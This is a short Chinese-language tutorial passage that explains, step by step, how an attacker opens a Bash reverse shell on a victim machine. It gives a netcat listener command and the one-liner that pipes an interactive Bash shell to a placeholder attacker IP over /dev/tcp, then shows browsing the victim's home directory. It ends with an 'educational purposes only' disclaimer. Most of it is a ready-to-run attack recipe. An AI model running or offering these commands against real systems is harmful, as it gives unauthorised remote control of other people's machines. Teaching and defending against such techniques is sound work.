- 在攻击者的机器上设置监听器:攻击者在他们的机器上设置一个监听器,用于接收来自受害者的反向 shell 连接。可以使用以下命令执行此操作:
nc -lvp 1234
这个命令告诉 netcat 在端口 1234 上监听传入的连接。
- 在受害者的机器上创建反向 shell:攻击者使用 Bash 命令在受害者的机器上创建一个反向 shell。可以使用以下命令执行此操作:
bash -i >& /dev/tcp/<攻击者IP>/1234 0>&1
这个命令使用 /dev/tcp 文件系统将 Bash shell 发送到攻击者的机器。 >& 运算符将 Bash shell 的标准输出和标准错误重定向到网络套接字。 0>&1 运算符将 Bash shell 的标准输入重定向到相同的网络套接字。
- 连接到反向 shell:一旦受害者的机器运行上述命令,它将尝试在端口 1234 上连接到攻击者的机器。当连接建立时,攻击者将在他们的机器上收到一个 shell 提示符,可以使用它在受害者的机器上运行命令。
例如,攻击者可以使用以下命令导航到受害者的主目录并列出其内容:
cd ~
ls -la
请注意,上面的示例仅供教育目的,不应用于恶意目的。